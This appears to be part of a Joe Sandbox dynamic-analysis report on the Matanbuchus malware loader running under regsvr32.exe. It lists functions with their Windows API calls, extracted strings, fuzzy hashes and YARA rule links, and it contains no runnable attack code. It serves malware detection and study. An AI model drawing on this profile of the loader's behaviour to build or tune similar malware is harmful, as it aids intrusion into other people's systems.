Opcode Fuzzy Hash: 7c768de94fea33e7c417ba71efbc358c71dfa8e3184356e4ad739f750d5d77a6
Instruction Fuzzy Hash: 73B147B5D05298CFDBA0CFAAC85079DBBF1FB48300F2085AAD46AAB755D7340A81CF51

Function 6BED4C40 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 153COMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 6BED4DE7

Strings

GB, xrefs: 6BED4D7B
r, xrefs: 6BED4DBC
(, xrefs: 6BED4D03
8, xrefs: 6BED4DA3
?2, xrefs: 6BED4D13

Memory Dump Source

Source File: 00000006.00000002.2050309350.000000006BEB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6BEB0000, based on PE: true

Associated: 00000006.00000002.2050282306.000000006BEB0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2050337503.000000006BEEB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2050355079.000000006BEFA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2050499345.000000006C3A7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2050527378.000000006C3A8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6beb0000_regsvr32.jbxd

Similarity

API ID: DirectorySystem
String ID: ($8$?2$GB$r
API String ID: 2188284642-435796455
Opcode ID: 450580f7fe7dc59354cf8d55f3097823d08ceac3450379112495f64faf55c039
Instruction ID: 820f317b52f6bb1189a563e59255937db85be5f4d4d83363cdef8bda41d14924
Opcode Fuzzy Hash: 450580f7fe7dc59354cf8d55f3097823d08ceac3450379112495f64faf55c039
Instruction Fuzzy Hash: D8714CB49442988FCF14CFA9E4806ADBBF5AF8A300F10919ED459EB351E7349A45CF15

Function 6BEDCEF0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 93sleepCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 6BEDD09A
Sleep.KERNEL32(00000064), ref: 6BEDD0A7

Strings

), xrefs: 6BEDCF7A
Z, xrefs: 6BEDCFB0
X, xrefs: 6BEDCF51
t, xrefs: 6BEDCF47

Memory Dump Source

Source File: 00000006.00000002.2050309350.000000006BEB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6BEB0000, based on PE: true

Associated: 00000006.00000002.2050282306.000000006BEB0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2050337503.000000006BEEB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2050355079.000000006BEFA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2050499345.000000006C3A7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2050527378.000000006C3A8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6beb0000_regsvr32.jbxd

Similarity

API ID: DirectorySleepWindows
String ID: )$X$Z$t
API String ID: 1499897475-3436847989
Opcode ID: 4e04a01a610dad5fcae6070abb7fce13b33f97f33655ca555b4830ce358d0f5b
Instruction ID: 0d32a0348ce170da0a5f06c1279b4dc4243d8167a4e64851f7f09f85d4c3a5bb
Opcode Fuzzy Hash: 4e04a01a610dad5fcae6070abb7fce13b33f97f33655ca555b4830ce358d0f5b
Instruction Fuzzy Hash: AA5121B4D44398CEDF14CFA8E48069DBBB5FF9A300F10A1A9D858AB351E3348A85CF11

Function 7EF23E80 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMON

Download Yara Rule

APIs

std::bad_exception::bad_exception.LIBCMTD ref: 7EF23EFF
std::bad_exception::bad_exception.LIBCMTD ref: 7EF23F19
std::bad_exception::bad_exception.LIBCMTD ref: 7EF23F33
std::bad_exception::bad_exception.LIBCMTD ref: 7EF23F4D

Strings

B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp, xrefs: 7EF23F69
false, xrefs: 7EF23F6E

Memory Dump Source

Source File: 00000006.00000002.2050560714.000000007EED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EED0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7eed0000_regsvr32.jbxd

Yara matches

Similarity

API ID: std::bad_exception::bad_exception
String ID: B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp$false
API String ID: 2160870905-4036550669
Opcode ID: 9976c5df0b2679dcad1f20bab6eb4c1a1b46f33b60531ef085e342d177ad5d45
Instruction ID: 60d1442b514d5bb04104bb870e9511124fcf623bc97c214018630473fce4a712
Opcode Fuzzy Hash: 9976c5df0b2679dcad1f20bab6eb4c1a1b46f33b60531ef085e342d177ad5d45
Instruction Fuzzy Hash: ED21A679A05248EBCF08DFA4D860DDE77B5AF84300F14896DF9116BA44DF31AA04CB55

Function 7EF23D60 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMON

Download Yara Rule

APIs

std::bad_exception::bad_exception.LIBCMTD ref: 7EF23DDF
std::bad_exception::bad_exception.LIBCMTD ref: 7EF23DF9
std::bad_exception::bad_exception.LIBCMTD ref: 7EF23E13
std::bad_exception::bad_exception.LIBCMTD ref: 7EF23E2D

Strings

B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp, xrefs: 7EF23E49
false, xrefs: 7EF23E4E

Memory Dump Source

Source File: 00000006.00000002.2050560714.000000007EED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EED0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7eed0000_regsvr32.jbxd

Yara matches

Similarity

API ID: std::bad_exception::bad_exception
String ID: B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp$false
API String ID: 2160870905-4036550669
Opcode ID: 7daf666fdd67c7a27fb3e985ea6fb4b3b84566593164bae72ffce8f42507df66
Instruction ID: aa42c0d8ae7b1d83a51bb8d1f674c0de46a36fcafec65c302bc0cf0d24ca6205
Opcode Fuzzy Hash: 7daf666fdd67c7a27fb3e985ea6fb4b3b84566593164bae72ffce8f42507df66
Instruction Fuzzy Hash: E921A679A05249EBCF04CFA4C860DDEB3B5AF94300F148DADF5116BA44DF31AA08CB54

Function 7EF4402E Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,7EF4413B,7EF41108,0000000C,7EF552A0,00000000,00000000,?,7EF44388,00000021,FlsSetValue,7EF5D860,7EF5D868,7EF552A0), ref: 7EF440EF

Strings

ext-ms-, xrefs: 7EF44099
api-ms-, xrefs: 7EF44085

Memory Dump Source

Source File: 00000006.00000002.2050560714.000000007EED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EED0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7eed0000_regsvr32.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: b84ef5c346a51e4c0b9950cdd9a75de58b49eb949c1ee490d67d300167fa6cad
Instruction ID: 43d6312ad5012eafcf64de343bcc3dba9e7cca99681e5cb8433245ea53878156
Opcode Fuzzy Hash: b84ef5c346a51e4c0b9950cdd9a75de58b49eb949c1ee490d67d300167fa6cad
Instruction Fuzzy Hash: 5F21C97A511111EBC713AA698C64A4A3FA5AF93370B201111ED57B7A84EB30EE21CAD0

Function 6BEDBD80 Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 191sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000064), ref: 6BEDC06E

Strings

r, xrefs: 6BEDBF16
(, xrefs: 6BEDBE5A
?2, xrefs: 6BEDBE6A
8, xrefs: 6BEDBEFD
GB, xrefs: 6BEDBED5

Memory Dump Source

Source File: 00000006.00000002.2050309350.000000006BEB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6BEB0000, based on PE: true

Associated: 00000006.00000002.2050282306.000000006BEB0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2050337503.000000006BEEB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2050355079.000000006BEFA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2050499345.000000006C3A7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2050527378.000000006C3A8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6beb0000_regsvr32.jbxd

Similarity

API ID: Sleep
String ID: ($8$?2$GB$r
API String ID: 3472027048-435796455
Opcode ID: 519ad5a1006d3a98406974ca0f77be9398b14117becca32bd53e7bf97e9bf285
Instruction ID: e1867a2efc415672ec2422a3bef5319186f272bbefa776e2c825cda8cdf0fb4d
Opcode Fuzzy Hash: 519ad5a1006d3a98406974ca0f77be9398b14117becca32bd53e7bf97e9bf285
Instruction Fuzzy Hash: 3B916AB0D44298DFCF10CFA8E48069DBBB6BF8A304F20919AD459AB345D3789A45CF15

Function 7EF3F245 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 64COMMONLIBRARYCODE

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F4,?,00003C16), ref: 7EF3F265
GetFileType.KERNEL32(00000000,?,00003C16), ref: 7EF3F277
swprintf.LIBCMT ref: 7EF3F298
WriteConsoleW.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,00003C16), ref: 7EF3F2D5

Strings

Assertion failed: %Ts, file %Ts, line %d, xrefs: 7EF3F28D

Memory Dump Source

Source File: 00000006.00000002.2050560714.000000007EED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EED0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7eed0000_regsvr32.jbxd

Yara matches

Similarity

API ID: ConsoleFileHandleTypeWriteswprintf
String ID: Assertion failed: %Ts, file %Ts, line %d
API String ID: 2943507729-1719349581
Opcode ID: ea9eb5ea53c9ab7b946367bc4e5b78f27a811de2aa4efffa2c6f1fe4b2f85f09
Instruction ID: 484a693d04e901db4400cd63be7b6c93212123e3235a0762716eca51bc57138f
Opcode Fuzzy Hash: ea9eb5ea53c9ab7b946367bc4e5b78f27a811de2aa4efffa2c6f1fe4b2f85f09
Instruction Fuzzy Hash: 9C11E27B900118EBCF209F298C64ADE77BCEF54210FA04959F927D7984EA30EE51CB64

Function 7EF407EA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,C93DE4EA,7EF552A0,?,00000000,7EF53C13,000000FF,?,7EF4077A,7D83FC4D,?,7EF4074E,7EF552A0), ref: 7EF4081F
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 7EF40831
FreeLibrary.KERNEL32(00000000,?,00000000,7EF53C13,000000FF,?,7EF4077A,7D83FC4D,?,7EF4074E,7EF552A0), ref: 7EF40853

Strings

CorExitProcess, xrefs: 7EF40829
mscoree.dll, xrefs: 7EF40818

Memory Dump Source

Source File: 00000006.00000002.2050560714.000000007EED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EED0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7eed0000_regsvr32.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: b313105e898027d5d3c2d427334c285b8e1eeb0a9d41486c6b760eeeee9d3417
Instruction ID: bd88c07a695039f32a686661f2c7464d581f70c7db2a46810df50f6600d1886f
Opcode Fuzzy Hash: b313105e898027d5d3c2d427334c285b8e1eeb0a9d41486c6b760eeeee9d3417
Instruction Fuzzy Hash: 10016236904655EFDB018F55CC15BAEBBF8FB55715F100635EC13A6BC0EB789A00CA90

Function 7EEE56A0 Relevance: 7.6, APIs: 5, Instructions: 91COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 7EEE56C7
int.LIBCPMTD ref: 7EEE56E0

Part of subcall function 7EEEAA20: std::_Lockit::_Lockit.LIBCPMT ref: 7EEEAA36
Part of subcall function 7EEEAA20: std::_Lockit::~_Lockit.LIBCPMT ref: 7EEEAA60

Concurrency::cancel_current_task.LIBCPMTD ref: 7EEE5727
std::_Lockit::~_Lockit.LIBCPMT ref: 7EEE57BB

Memory Dump Source

Source File: 00000006.00000002.2050560714.000000007EED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EED0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7eed0000_regsvr32.jbxd

Yara matches

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
String ID:
API String ID: 3053331623-0
Opcode ID: 882845cdba5368cb18a12ade6254e7c440a94656158afbacd33e0b27b2ca5e39
Instruction ID: c2c7754d3dde7cf3da2fbc92ebc9ae2a5c0f540ca0afbc91228e5218b880a343
Opcode Fuzzy Hash: 882845cdba5368cb18a12ade6254e7c440a94656158afbacd33e0b27b2ca5e39
Instruction Fuzzy Hash: D941E5B9D14609DFCB04CF98D990AEEFBB5BF48310F208669E815A7790D7346A05CFA1

Function 7EEE57E0 Relevance: 7.6, APIs: 5, Instructions: 91COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 7EEE5807
int.LIBCPMTD ref: 7EEE5820

Part of subcall function 7EEEAA20: std::_Lockit::_Lockit.LIBCPMT ref: 7EEEAA36
Part of subcall function 7EEEAA20: std::_Lockit::~_Lockit.LIBCPMT ref: 7EEEAA60

Concurrency::cancel_current_task.LIBCPMTD ref: 7EEE5867
std::_Lockit::~_Lockit.LIBCPMT ref: 7EEE58FB

Memory Dump Source

Source File: 00000006.00000002.2050560714.000000007EED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EED0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7eed0000_regsvr32.jbxd

Yara matches

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
String ID:
API String ID: 3053331623-0
Opcode ID: e2590593fb4001bcde9870dc9ad0f256b87b0eac3c57133b6e17f700a41b30ff
Instruction ID: 45f7bb41c5f79f9e88d0a0b885ce8f4c2024c10dcbe84cd04b728f5bca1a749e
Opcode Fuzzy Hash: e2590593fb4001bcde9870dc9ad0f256b87b0eac3c57133b6e17f700a41b30ff
Instruction Fuzzy Hash: F241D7B9D04609DFCB04CF94D990AEEFBB5BF48310F20466AE815B7790DB346A05CBA1

Function 7EEE5920 Relevance: 7.6, APIs: 5, Instructions: 91COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 7EEE5947
int.LIBCPMTD ref: 7EEE5960

Part of subcall function 7EEEAA20: std::_Lockit::_Lockit.LIBCPMT ref: 7EEEAA36
Part of subcall function 7EEEAA20: std::_Lockit::~_Lockit.LIBCPMT ref: 7EEEAA60

Concurrency::cancel_current_task.LIBCPMTD ref: 7EEE59A7
std::_Lockit::~_Lockit.LIBCPMT ref: 7EEE5A3B

Memory Dump Source

Source File: 00000006.00000002.2050560714.000000007EED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EED0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7eed0000_regsvr32.jbxd

Yara matches

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
String ID:
API String ID: 3053331623-0
Opcode ID: 5d522c145a4d7a06a061b187f4608e780bfa9638128596286799674ce14f1c4a
Instruction ID: fa1fe97c1eca6cdc23476c02b9c8dd4cb4c719330b34868574a3b7fcc7ffd3da
Opcode Fuzzy Hash: 5d522c145a4d7a06a061b187f4608e780bfa9638128596286799674ce14f1c4a
Instruction Fuzzy Hash: D041F6B9D14609DFCB04CF98D990AEEBBB5BF48310F208629E815B7790D7346A44CFA1

Function 7EF2FDA4 Relevance: 7.5, APIs: 5, Instructions: 44COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 7EF2FDAB
std::_Lockit::_Lockit.LIBCPMT ref: 7EF2FDB6
std::_Lockit::~_Lockit.LIBCPMT ref: 7EF2FE24

Part of subcall function 7EF2FF07: std::locale::_Locimp::_Locimp.LIBCPMT ref: 7EF2FF1F

std::locale::_Setgloballocale.LIBCPMT ref: 7EF2FDD1
_Yarn.LIBCPMT ref: 7EF2FDE7

Memory Dump Source

Source File: 00000006.00000002.2050560714.000000007EED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EED0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7eed0000_regsvr32.jbxd

Yara matches

Similarity

API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
String ID:
API String ID: 1088826258-0
Opcode ID: 4b7543174604e06dcac14ceeac8a80e6c61b3055d5cad79c1fa7ef3d5f59a12b
Instruction ID: 2b6cbcd5cd6134f846f9698663e299103d37bdb724a284b9243ca6722842cf1d
Opcode Fuzzy Hash: 4b7543174604e06dcac14ceeac8a80e6c61b3055d5cad79c1fa7ef3d5f59a12b
Instruction Fuzzy Hash: D501DF7FA14511EBC706DF20C86567DBBBABF84211B24045AD802A7B80DF746F22CBC4

Function 7EF34F92 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000011,00000000,00000800,?,7EF34F43,00000000,00000001,7F2355E4,?,?,?,7EF350E6,00000004,InitializeCriticalSectionEx,7EF5AE34,InitializeCriticalSectionEx), ref: 7EF34F9F
GetLastError.KERNEL32(?,7EF34F43,00000000,00000001,7F2355E4,?,?,?,7EF350E6,00000004,InitializeCriticalSectionEx,7EF5AE34,InitializeCriticalSectionEx,00000000,?,7EF34E9D), ref: 7EF34FA9
LoadLibraryExW.KERNEL32(00000011,00000000,00000000,?,00000011,7EF33D43), ref: 7EF34FD1

Strings

api-ms-, xrefs: 7EF34FB6

Memory Dump Source

Source File: 00000006.00000002.2050560714.000000007EED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EED0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7eed0000_regsvr32.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 634e87ade52366474913633c5179a0fe4366309d1f05add3ed24b82bdb969fe5
Instruction ID: 5e02906e8a0aa5b1fb4b2af072ce2b92751114b029f8faf32f27f6ec88d281d4
Opcode Fuzzy Hash: 634e87ade52366474913633c5179a0fe4366309d1f05add3ed24b82bdb969fe5
Instruction Fuzzy Hash: 0FE04F39284204F7EB122EB1DC15F093FA5AF22B52F744420F90FA9CD4E761E6619AD4

Function 7EF2F930 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(ntdll.dll,RtlRandomEx,?,7EF2F717,?,?,?,7EF2EF6C,?,0000000F,?,00000000,00000208), ref: 7EF2F946
GetProcAddress.KERNEL32(00000000), ref: 7EF2F94D

Strings

RtlRandomEx, xrefs: 7EF2F93C
ntdll.dll, xrefs: 7EF2F941

Memory Dump Source

Source File: 00000006.00000002.2050560714.000000007EED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EED0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7eed0000_regsvr32.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: RtlRandomEx$ntdll.dll
API String ID: 1646373207-4284430886
Opcode ID: 674e187d3472ca8e8484b8600e85a1e98bed9cd50655fcd2f3e4365cfe34ff0d
Instruction ID: 6dc983a4af97f90a25669c1dfe02c0744e9ecf6e4485f792b0a6f897f5a0eac8
Opcode Fuzzy Hash: 674e187d3472ca8e8484b8600e85a1e98bed9cd50655fcd2f3e4365cfe34ff0d
Instruction Fuzzy Hash: EED0A7BA200305EBCB005FE6CC4CE253FEC9F581113100010FD0EC1F00D73596689E40

Function 7EF055B0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 209COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCONCRTD ref: 7EF05868

Strings

parse error, xrefs: 7EF05633, 7EF0566E
parse_error, xrefs: 7EF055D5

Memory Dump Source

Source File: 00000006.00000002.2050560714.000000007EED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EED0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7eed0000_regsvr32.jbxd

Yara matches

Similarity

API ID: std::exception::exception
String ID: parse error$parse_error
API String ID: 2807920213-1820534363
Opcode ID: 863180cb20c661e6f98e6cbeaed18ae3bf41f89e08c0079d9a8ff96e513e3f3a
Instruction ID: d40e426add34c307849e6a7992fe9194c52ba56611f8e1524b01d2bce09c3a82
Opcode Fuzzy Hash: 863180cb20c661e6f98e6cbeaed18ae3bf41f89e08c0079d9a8ff96e513e3f3a
Instruction Fuzzy Hash: 72A147B8D05258DFDB14CF98C9A0BEEBBB1BF48300F108599D959AB341DB306A45CF90

Function 7EEE7AD0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 7EEE7AF3
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 7EEE7BBF

Part of subcall function 7EF2FEA2: _Yarn.LIBCPMT ref: 7EF2FEC1
Part of subcall function 7EF2FEA2: _Yarn.LIBCPMT ref: 7EF2FEE5

Strings

bad locale name, xrefs: 7EEE7BC9

Memory Dump Source

Source File: 00000006.00000002.2050560714.000000007EED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EED0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7eed0000_regsvr32.jbxd

Yara matches

Similarity

API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 1908188788-1405518554
Opcode ID: 553c345ace08b1fcdb1886a32c1929a53b0c19b478c0b3989adcbe636fdebb99
Instruction ID: deecd06b9b5c2ec0caf3013193e61825d8fa28887b5080195cee90a9cb391e35
Opcode Fuzzy Hash: 553c345ace08b1fcdb1886a32c1929a53b0c19b478c0b3989adcbe636fdebb99
Instruction Fuzzy Hash: F24114B4905289DFDB01CF98C950BAEFBF1BF49304F248599D414AB381C77A9A01CBA5

Function 7EEE89B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51COMMONLIBRARYCODE

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 7EEE8A31

Strings

V|~, xrefs: 7EEE8A06, 7EEE8A11, 7EEE8A26, 7EEE8A39, 7EEE8A42, 7EEE8A2C
V|~, xrefs: 7EEE89B9

Memory Dump Source

Source File: 00000006.00000002.2050560714.000000007EED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EED0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7eed0000_regsvr32.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: V|~$V|~
API String ID: 2659868963-928374464
Opcode ID: c68113a3aac1aab2d6ccf772ccd6e811bf785c81d7d658a4accae7bf579832e7
Instruction ID: 0a6313eebe4d2fff14f904b2d91ed6c55ecb69b1c1f16276801776b6a4a46e7f
Opcode Fuzzy Hash: c68113a3aac1aab2d6ccf772ccd6e811bf785c81d7d658a4accae7bf579832e7
Instruction Fuzzy Hash: A121E0B8D052499FCB04CF98C490AEEFBB1AF48304F14819AD849BB340D331AA81CBA5

Function 7EED4A70 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMTD ref: 7EED4A87

Strings

!J~, xrefs: 7EED4A76, 7EED4A82
!J~, xrefs: 7EED4A7F, 7EED4A8C, 7EED4A8F

Memory Dump Source

Source File: 00000006.00000002.2050560714.000000007EED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EED0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7eed0000_regsvr32.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task
String ID: !J~$!J~
API String ID: 118556049-864044967
Opcode ID: a1abe9a9221fa6d6b22fbd57380c33b7133d727115df8711cf372a32463a87d5
Instruction ID: 33778647a3064047cae8db18c17d3adad925ed73c3ca64337cf44a0e41c04110
Opcode Fuzzy Hash: a1abe9a9221fa6d6b22fbd57380c33b7133d727115df8711cf372a32463a87d5
Instruction Fuzzy Hash: A7F04F78D1010CEBCB04DFA8C591ADDFBB5EF84248F2085EAE8069B348E2309B45CB85

Analysis Process: regsvr32.exePID: 1272, Parent PID: 7148COMMON

Execution Graph

Execution Coverage:	0.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	19
Total number of Limit Nodes:	2

Executed Functions

Function 7F4D77A0 Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 331
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexA.KERNEL32(00000000,00000001,?), ref: 7F4D7A47
GetLastError.KERNEL32 ref: 7F4D7B44
CloseHandle.KERNEL32(00000000,6FA9D62B,?,?,?), ref: 7F4D7CBA

Strings

B, xrefs: 7F4D7AED
{, xrefs: 7F4D7834
9mD, xrefs: 7F4D78A9
*, xrefs: 7F4D7A5A
u, xrefs: 7F4D78D3

Memory Dump Source

Source File: 0000000B.00000002.2555445907.000000007F4B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F4B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7f4b0000_regsvr32.jbxd

Yara matches

Similarity

API ID: CloseCreateErrorHandleLastMutex
String ID: *$9mD$B$u${
API String ID: 4294037311-4130828584
Opcode ID: fbcff99bd3df421ec852682293615403dc50842ae02e18d4065d573efac305b8
Instruction ID: 8748f600bee5e7993ae74896fb63416441226b074a7b78ff35f211dc9765db4a
Opcode Fuzzy Hash: fbcff99bd3df421ec852682293615403dc50842ae02e18d4065d573efac305b8
Instruction Fuzzy Hash: A6F188B9D14258CFDB14CFAAC9907AEBBF1BF49315F24819AE149A7380D3345A86CF50

Function 7F50CAF0 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 289
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 7F50CCEE

Strings

2, xrefs: 7F50CAFB
), xrefs: 7F50CBCF
?, xrefs: 7F50CCD1
m, xrefs: 7F50CC15
e, xrefs: 7F50CC0B
n , xrefs: 7F50CB0E

Memory Dump Source

Source File: 0000000B.00000002.2555445907.000000007F4B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F4B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7f4b0000_regsvr32.jbxd

Yara matches

Similarity

API ID: DirectorySystem
String ID: )$2$?$m$n $e
API String ID: 2188284642-1749247282
Opcode ID: 302969bf52c1bee33acdca85f6f7b99437160f7f022310e13d03a67929cd67ca
Instruction ID: a8e86e5a68c514d1149d72462671784b7f6048d8eba8e8aaca1e4aa6bd0e80c4
Opcode Fuzzy Hash: 302969bf52c1bee33acdca85f6f7b99437160f7f022310e13d03a67929cd67ca
Instruction Fuzzy Hash: 74F16775D042A8CBDB25CF6AC9847ADBBB1BF89311F2480EAD04DA7390D7745A89CF50

Function 7F4F9280 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 204
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetShellWindow.USER32 ref: 7F4F9497

Strings

2, xrefs: 7F4F945E
MNo name attribute , xrefs: 7F4F92FF
Q, xrefs: 7F4F9294
c, xrefs: 7F4F92F7
\, xrefs: 7F4F933A

Memory Dump Source

Source File: 0000000B.00000002.2555445907.000000007F4B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F4B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7f4b0000_regsvr32.jbxd

Yara matches

Similarity

API ID: ShellWindow
String ID: 2$MNo name attribute $Q$\$c
API String ID: 2831631499-3960561890
Opcode ID: 91f3371f4ac5075c76a9b9e2bfa71b47dea11cd316a9cc078d89a1728c286cad
Instruction ID: 4a751dd9ab7a512847f937f6ff5fe01af56de96eeae43056fbd130799c3e951f
Opcode Fuzzy Hash: 91f3371f4ac5075c76a9b9e2bfa71b47dea11cd316a9cc078d89a1728c286cad
Instruction Fuzzy Hash: C8A14779D04298CFDB14CFAAC9807ADBBF1BF49311F28919AD448A7381D3745A8ACF51

Function 7F4F95F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 191
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 7F4F986F
GetDriveTypeA.KERNEL32(7F5381EC), ref: 7F4F9903

Strings

*, xrefs: 7F4F9846

Memory Dump Source

